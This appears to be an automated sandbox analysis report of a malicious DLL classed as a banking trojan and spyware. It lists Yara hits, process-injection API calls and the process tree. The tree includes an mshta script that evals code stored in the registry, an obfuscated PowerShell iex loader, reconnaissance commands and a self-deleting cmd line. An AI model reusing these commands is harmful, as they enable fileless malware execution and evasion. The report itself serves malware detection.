                      Source: Yara match | File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary

                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D4BF1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D1645
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D829C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062767CA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628154D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06293DB0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627B238
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052B4B8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00529660
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052EEF8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00547850
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00531864
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00532830
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005498A8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005480A8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052716C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00525110
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052410C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053E120
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053B9E0
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005451A8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00534240
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00531248
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0054C220
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00542AD8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00548AC0
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005473EC
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0054AC50
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053C46C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052D404
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00523C3C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00542428
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0054D4D4
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005234D8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005434C0
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00536CA4
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00529D1C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053CD1C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00540530
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00547DB4
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00541E5C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00538670
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00541638
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053BED0
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00532EE8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00545684
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00521EA8
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00534F5C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00536F78
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0054772C
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052572C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572393EEF8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572393B4B8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395C220
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723941248
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723944240
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239551A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572394B9E0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572393410C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723935110
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572394E120
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239598A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239580A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723942830
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723957850
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723941864
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723946F78
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395772C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572393572C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723944F5C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723955684
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723931EA8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572394BED0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723942EE8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723951638
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723948670
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723951E5C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723939660
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723957DB4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723950530
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572394CD1C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723939D1C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723946CA4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395D4D4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239534C0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239334D8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572393D404
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723952428
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395AC50
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723933C3C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572394C46C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239573EC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723958AC0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_0000015723952AD8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06288E57 CreateProcessAsUserW
                      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 2oCOO5LbPu.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2oCOO5LbPu.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D190C GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D6D0A NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D84C1 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628BE80 NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06280782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062774AE NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06286DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06282331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06285312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627710A GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06287950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062736BB NtGetContextThread,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062764C4 memset,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06285220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06283829 NtQuerySystemInformation,RtlNtStatusToDosError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0053583C NtCreateSection
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005240C0 NtReadVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0054A148 NtQueryInformationProcess
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052B11C RtlAllocateHeap,NtQueryInformationProcess
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005341D8 NtMapViewOfSection
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0052AA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005404CC NtAllocateVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00526D24 NtWriteVirtualMemory
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_005265E4 NtQueryInformationToken,NtQueryInformationToken,NtClose
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_00529660 NtSetContextThread,NtUnmapViewOfSection,NtClose
                      Source: C:\Windows\System32\control.exe | Code function: 24_2_0055F002 NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395A148 NtQueryInformationProcess
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239365E4 NtQueryInformationToken,NtQueryInformationToken,NtClose
                      Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572396F002 NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: 2oCOO5LbPu.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs 2oCOO5LbPu.dll
                      Source: 2oCOO5LbPu.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220504
                      Source: 2E09.bin.27.dr | Binary string: Boot Device: \Device\HarddiskVolume2
                      Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                      Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: 2oCOO5LbPu.dll | ReversingLabs: Detection: 50%
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
